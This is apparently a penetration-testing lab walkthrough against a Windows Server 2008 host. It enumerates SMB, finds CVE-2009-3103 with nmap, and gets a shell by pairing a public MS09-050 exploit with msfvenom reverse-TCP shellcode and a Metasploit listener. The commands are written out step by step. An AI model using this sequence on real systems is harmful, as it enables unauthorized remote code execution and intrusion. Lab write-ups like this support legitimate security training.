SMB Enumeration [InitialAccess -NT]

──(kali㉿kali)-[~/pg/internal]
└─$ netexec smb $internal -u guest -p '' --shares
SMB         192.168.203.40  445    INTERNAL         [*] Windows Server (R) 2008 Standard 6001 Service Pack 1 x32 (name:INTERNAL) (domain:internal) (signing:False) (SMBv1:True)
SMB         192.168.203.40  445    INTERNAL         [-] internal\guest: STATUS_ACCOUNT_DISABLED

┌──(kali㉿kali)-[~/pg/internal]
└─$ nmap --script smb-brute.nse -p445 $internal
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 12:18 IST
Nmap scan report for 192.168.203.40
Host is up (0.073s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-brute:
|_  guest:<blank> => Valid credentials, account disabled

Nmap done: 1 IP address (1 host up) scanned in 260.56 seconds

┌──(kali㉿kali)-[~/pg/internal]
└─$ smbclient -N -L $internal
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.203.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Null session not allowd.

Looking for vulnerability.

┌──(kali㉿kali)-[~/pg/internal]
└─$ nmap --script smb-vuln* -p 139,445 $internal
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 12:19 IST
Nmap scan report for 192.168.203.40
Host is up (0.073s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 38.19 seconds

I will try the CVE-2009-3103

Found one github exploit.

https://raw.githubusercontent.com/Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-/refs/heads/main/MS09-050.pyraw.githubusercontent.com

In the exploit code, shell code is needed to make shell code. The command is mentioned.

I will not be using meterpreter reverse tcp. I will be using reverse TCP only.

I tried windows/shell_reverse_tcp , windows/x64/shell/reverse_tcp but didn't work and then I tried windows/shell/reverse_tcp and it worked.

Making payload:

msfvenom -p windows/shell/reverse_tcp LHOST=$IP_KALI LPORT=443  EXITFUNC=thread  -f python | sed 's/\bbuf\b/shell/g'

The last command changes the variable name to shell from buf .

Now replace shell code in exploit with your shell code.

Start the listener.

msfconsole -q -x "use multi/handler; set payload windows/shell/reverse_tcp; set lhost $IP_KALI; set lport 443; exploit"

Run the exploit.

python3 MS09-050.py $internal

You will see that the exploit gives an error but we get a shell in the listener.

PreviousLooking for public exploit from Nmap result Nextproof.txt [Done]

Last updated 1 year ago

hashtagLooking for vulnerability.

Looking for vulnerability.